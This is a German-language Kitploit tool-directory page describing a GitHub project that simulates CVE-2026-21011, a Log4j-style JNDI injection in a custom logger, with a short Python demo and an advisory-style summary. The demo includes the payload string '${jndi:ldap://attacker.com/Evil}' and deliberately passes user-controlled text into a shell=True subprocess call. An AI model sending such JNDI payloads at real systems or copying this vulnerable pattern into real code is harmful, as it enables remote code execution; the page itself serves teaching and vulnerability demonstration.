Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-21011-Log4j-style-JNDI-Injection-in-Custom-Logger-Simulated- — Simuliert CVE-2026-21011, eine Log4j-artige JNDI-Injektion in einem benutzerdefinierten Logger: parst ${jndi:...}-Muster und demonstriert LDAP-ausgelöste Remote-Codeausführung. | Kitploit
Tools/GitHubGitHub/george0papasotiriou/cve-2026-21011-log4j-style-jndi-injection-in-custom-logger-simulated-
SchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & Bildung
GitHubgeorge0papasotiriou/cve-2026-21011-log4j-style-jndi-injection-in-custom-logger-simulated-

CVE-2026-21011-Log4j-style-JNDI-Injection-in-Custom-Logger-Simulated-

Simuliert CVE-2026-21011, eine Log4j-artige JNDI-Injektion in einem benutzerdefinierten Logger: parst ${jndi:...}-Muster und demonstriert LDAP-ausgelöste Remote-Codeausführung.

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
vor 16 TagenNoch nicht geprüft

CVE-2026-21011 – Log4j-artige JNDI-Injection in benutzerdefiniertem Logger (Simuliert)

Programmcode (Java-Simulation in Python)

root@kitploit:~
# log4j_sim.py - Custom logger that evaluates ${...} patterns
import subprocess, re

def log(message):
    # Vulnerable: looks up JNDI-like syntax and executes
    pattern = r'\$\{jndi:(.+?)\}'
    for match in re.finditer(pattern, message):
        lookup = match.group(1)
        if lookup.startswith('ldap://'):
            # Simulate connecting to LDAP and loading a class
            print(f"Loading malicious class from {lookup}")
            subprocess.run(f"echo 'CLASS LOADED: {lookup}'", shell=True)  # just demo

log("User-Agent: ${jndi:ldap://attacker.com/Evil}")

CVE-2026-21011 – JNDI-Injection über benutzerdefinierten Logger

Severity: Critical

Überblick

Ein benutzerdefiniertes Logging-Framework wertet ${jndi:...}-Muster in Logmeldungen aus, ähnlich wie die berüchtigte Log4Shell-Schwachstelle. Ein Angreifer kann eine JNDI-Lookup injizieren, um beliebigen Code von einem entfernten Server zu laden und auszuführen.

Schwachstellendetails

  • Typ: Code-Injection / JNDI-Injection
  • Auswirkung: Remote Code Execution (Entfernte Codeausführung).
  • Grundursache: Der Logger parst benutzerkontrollierte Daten und führt basierend auf dem Inhalt dynamische Lookups durch.

Exploit-Demonstration

Führen Sie die Simulation aus:

root@kitploit:~
python log4j_sim.py

Das Skript gibt aus, dass es eine Klasse vom LDAP-Server des Angreifers laden würde.

Tool herunterladen